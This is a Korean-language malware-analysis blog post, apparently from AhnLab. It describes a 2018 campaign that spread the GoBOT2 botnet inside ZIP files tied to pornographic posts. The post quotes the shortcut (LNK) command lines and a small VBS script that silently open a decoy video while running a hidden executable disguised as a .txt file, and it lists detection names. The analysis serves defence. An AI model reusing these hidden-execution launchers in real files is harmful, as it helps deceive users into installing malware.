2018년 6월 초부터 음란물과 함께 악성코드가 활발히 유포되고 있는 것을 확인했다.해당 악성코드는 음란 게시글을 이용해 사용자들에게 *.zip 파일을 다운받게 유도했고, 다운받은 zip을 풀어 실행할 경우 실제 음란 사진 또는 음란 동영상이 실행되어 사용자가 악성코드에 감염된 사실을 인지하지 못하게 한다.
[그림-1] 6월 20일 자 업로드 된 음란 게시글
[그림-1]과 같은 게시글에서 파일을 다운로드 후 압축을 풀면 [그림-2] 처럼 *.mp4를 실행하는 바로가기 파일(*.LNK) 하나만 보이지만 폴더 옵션에서 “숨김파일 표시”를 체크하면 [그림-3] 처럼 mp4, lnk, txt 세 가지 확장자를 가진 파일이 존재함을 알 수 있다.
[그림-2] 6월20일 이전 유포된 악성코드 zip - 숨김파일 표시안함
[그림-3] 6월20일 이전 유포된 악성코드 zip - 숨김파일 표시
사용자의 클릭을 유도하는 바로가기 파일의 명령어를 보면 사용자가 인지하지 못하게 실제 *.mp4 동영상 파일도 실행하고, cmd를 이용하여 *.txt를 실행한다. 참고로 XP의 경우 확장자가 *.txt이면 notepad가 실행되지만 Win7의 경우 파일 구조에 맞게 EXE가 실행된다.
[그림-4] 바로가기 파일 속성
%windir%\system32\cmd.exe -ExecutionPolicy bypass -noprofile -windowstyle hidden cmd /c @start 국산순두부.mp4 & cmd /c @start 국산순두부.txt |
[표-1] 바로가기 명령어
안랩에 수집된 악성코드의 파일명을 보면 자극적인 이름을 사용하고 확장자는 *.txt 를 사용하였다. 실제로 해당 파일들은 64bit 닷넷 악성코드로, 실행 시 정상 프로세스 명으로 위장한 파일 2개를 생성 및 실행한다. 실행 된 프로세스는 “GoBOT2”이라는 Botnet 이다.
[그림-5] 안랩에 수집된 파일 중 일부
6월 20일 기준으로는 바로가기 파일이 VBS파일을 실행시키고, VBS파일이 동영상 및 악성코드를 실행시키는 구조로 변화했다.
[그림-6] 6월 20일 수집된 zip 파일
%windir%\system32\cmd.exe hidden cmd /c @start 조건처음이야.vbs |
[표-2] 6월 20일 수집된 바로가기 파일 명령어
Set WshShell = WScript.CreateObject("WScript.Shell") return = WshShell.Run ("cmd /c @start 조건처음이야.mp4 & cmd /c @start 조건처음이야.txt" ,0 ,true) |
[표-3] 6월 20일 수집된 VBS 코드
바로가기 파일에 의해 실행되는 악성코드는 2016년 이후 부터 랜섬웨어, 마이너류에 많이 사용되어왔다. 그러므로 사용자는 늘 인터넷에서 파일을 다운로드 받을 경우 알 수 없는 글에 대해 주의하여야 한다.
현재 안랩 제품에서는 음란물과 함께 유포되는 악성코드를 다음과 같이 진단하고 있다.
- Trojan/Win64.Agent(2018.06.10.01)
- LNK/Runner (2018.06.11.01)
- LNK/Autorun.Gen (2018.06.15.00)
'악성코드 정보' 카테고리의 다른 글
| 파워쉘 스크립트를 이용한 GandCrab 랜섬웨어의 유포 (Fileless) (0) | 2018.07.06 |
|---|---|
| 동일 URL에서 유포되는 Hermes v2.1과 GandCrab v4 랜섬웨어 (0) | 2018.07.05 |
| GrandSoft 익스플로잇 킷을 통한 갠드크랩 랜섬웨어 유포 (0) | 2018.06.20 |
| Fileless 형태 매그니베르 랜섬웨어 인젝션 대상(불특정 프로세스) 변경 (0) | 2018.06.11 |
| Fileless 형태 매그니베르 랜섬웨어 재등장 (3) | 2018.06.05 |
댓글